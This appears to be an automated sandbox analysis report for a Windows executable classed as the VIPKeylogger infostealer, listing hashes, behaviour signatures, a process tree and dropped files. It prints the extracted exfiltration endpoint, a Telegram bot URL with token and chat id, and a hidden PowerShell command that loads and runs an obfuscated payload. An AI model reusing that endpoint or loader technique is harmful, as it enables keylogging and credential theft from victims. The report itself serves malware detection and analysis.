Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
10-01-2025 14:15
General
-
Target
f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe
-
Size
560KB
-
MD5
21eb0bfd14e8ab29a3c29d5b60ee09e1
-
SHA1
9cff284042166495e20428500545b99330a1a9c8
-
SHA256
f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba
-
SHA512
cf0d15a179940c800cb669384a0874200650b0da7b8db58c3e1a8cf87cb5d3ac5953a10c68366436917812f24d32a7f12506831294bec53b6e41ed8a7b1a56e8
-
SSDEEP
12288:n93jlz5CwkzUf1DYt/itWe7NAZSfR6IWAKsbk1B8B:n93jlzcxzUf9S6tx7mWKNeoiB
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7808466522:AAFleMCkdYBjkW3SQRMH5osM11THNEIFjRA/sendMessage?chat_id=7161037710
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Blocklisted process makes network request 11 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe"C:\Users\Admin\AppData\Local\Temp\f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
756B
MD5cb03115a3e717dd02fea6c900be8349d
SHA198e21b669efd85d0e27b5fc087d88b872000a05c
SHA256c53ecd96e8d3cf8a3e7eb1cb882f3fef10d9cec3c86fa76323945e1f216afcd6
SHA512eeafb6adae8e7e900442efde7d03b2f5a84837a1cb8bbae74ff21263f7d331df711d11a54855a5c557b7bf113e6be6acbc5958f8772b5f1f83bd0839cdc21a94
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
336KB
MD58fb7148f8dbda5b61030f3dfb6d7fa25
SHA1da981906695b80ce5e6c8f7e20e945e6a0899aa7
SHA256f3266f0aa22192f9e01248a771505a0fe3c05ff63fc7a88ce56ade7d7af20903
SHA512edf1b8a264fa98131933f3a5c734bbf1631941f648eeb89742c0c6cd43225d67bf99c221e7b23817a0c9f6de1f54887f4d1650db9805c459dbab007f1e5f514b
-
Filesize
66KB
MD5ea1e2a9f4de28839b57fe9978897843c
SHA1b012c5ac62dbc1657062674e6ff102a2209ae777
SHA2567c6bbb62d20bb41ff822a460afcc6cd4dc670453aa333558db29d53b7e6bb027
SHA512ba127e3e91c4e233e778abdd86e59b5272023c99ed0c069361e3ae0b8d4e65a7d3f57887af7bb714f50df22572cb845088b67f4184254e6155bd196adc42537a
-
Filesize
18.3MB
-
Filesize
296KB
-
Filesize
5.2MB
-
Filesize
320KB
-
Filesize
1.8MB
-
Filesize
624KB
-
Filesize
18.3MB
-
Filesize
652KB
-
Filesize
32KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
6.5MB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
200KB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
408KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
32.0MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB